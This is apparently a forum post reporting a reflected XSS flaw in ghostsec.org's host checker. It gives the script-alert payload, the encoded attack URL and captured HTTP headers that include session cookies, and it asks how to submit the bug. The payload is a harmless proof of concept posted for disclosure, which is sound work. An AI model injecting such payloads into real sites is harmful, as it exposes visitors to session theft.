http://ghostsec.org/server.php?job=host ... Fscript%3E
could you test this manually by going to ghostsec.org -> tools -> host checker -> <script>alert('XSSPOSED')</script> as input
this definitely works.
also if someone can tell me how exactly i'd go about submitting this, that would be useful. here is the output from live http headers:
Code: Select all
m@m:~/Desktop$ cat header
http://ghostsec.org/server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E
GET /server.php?job=hostCheck&u=%3Cscript%3Ealert(%27XSSPOSED%27)%3C%2Fscript%3E HTTP/1.1
Host: ghostsec.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://ghostsec.org/
Cookie: 300gpBAK=R4178759823; 300gp=R394679152; PHPSESSID=b8b6865f79f7faf1c9ca1e129eb35fbc
Connection: keep-alive
HTTP/1.1 200 OK
Set-Cookie: 300gp=R394679152; path=/; expires=Fri, 11-Dec-2015 14:01:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 12:58:38 GMT
Connection: keep-alive
X-Geo: varn35.rbx5
X-Geo-Port: 1011
X-Cacheable: Not cacheable: no-cache
----------------------------------------------------------
m@m:~/Desktop$